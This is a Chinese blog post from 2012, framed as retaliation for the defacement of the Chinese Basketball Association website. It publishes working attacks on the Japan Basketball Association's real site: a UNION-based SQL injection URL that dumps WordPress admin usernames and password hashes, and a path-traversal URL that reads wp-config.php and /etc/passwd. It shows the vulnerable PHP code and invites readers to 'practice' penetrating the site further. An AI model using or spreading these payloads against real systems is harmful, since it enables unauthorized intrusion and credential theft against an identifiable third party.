存档

文章标签 ‘日本篮协网站漏洞’

日本入侵中国篮协网站,其日本篮协网站同样存在漏洞

2012年11月8日 7 条评论

    前因:

    2012年11月7日,中国篮协官网主页上部背景被改成黑色,并出现了包含“钓鱼岛”和部分侮辱性言辞的日文词句。网页中间还出现了日美两国的国旗。

    看到这个微博后,就想看看日本篮协网站的安全性到底如何?

    日本篮协网站(www.japanbasketball.jp)功能比较简单使用了开源系统WordPress,WordPress总体上安全性较高,出现漏洞一般情况也是在插件上,所以本以为日本篮协网站的安全性应该很高,但在网站上随意点了几下后,让我大为惊叹,漫山遍野注入漏洞……

1 、SQL注入

    注入漏洞较多,随便点点都可以发现,选择了一个支持union的点,可以直接暴出WordPress管理员用户名和密码,代码如下:

    http://www.japanbasketball.jp//wintercup/2012/team_detail.php?team_id=100454&event_id=118/**/and/**/1=5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat%280×232323,user_login,0x2d2d2d,user_pass,0x2d2d2d,0×232323%29,16,17,18,19,20,
21,22%20from%20wp_users

2、任意文件查看漏洞

    漏洞地址:https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=image_display.php


<?
$image_path =$_GET['p'];

if (file_exists($image_path)) {
header('Content-Type: image/jpeg');
readfile($image_path);
}

?>

    $image_path未经过任何限制,直接使用readfile调用,导致漏洞产生。

    查看网站源码:

    https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=../../wp-config.php

    查看/etc/passwd:

    https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=../../../../../../../../../../etc/passwd

    有了这二个漏洞,继续渗透的思路就很开阔了,就是时间的问题了,比跨库查询、通过注入获取所有表内容、查看网站数据库配置文件、获取服务器中apache、ftp等配置文件、有时间和兴趣的同学可以练练手。

    只想对告诉日本,在入侵我们篮协的同时,其实你们自己篮协的网站同样不安全。本文没有任何技术含量,如果日本篮协网站被篡改,与007安全无关!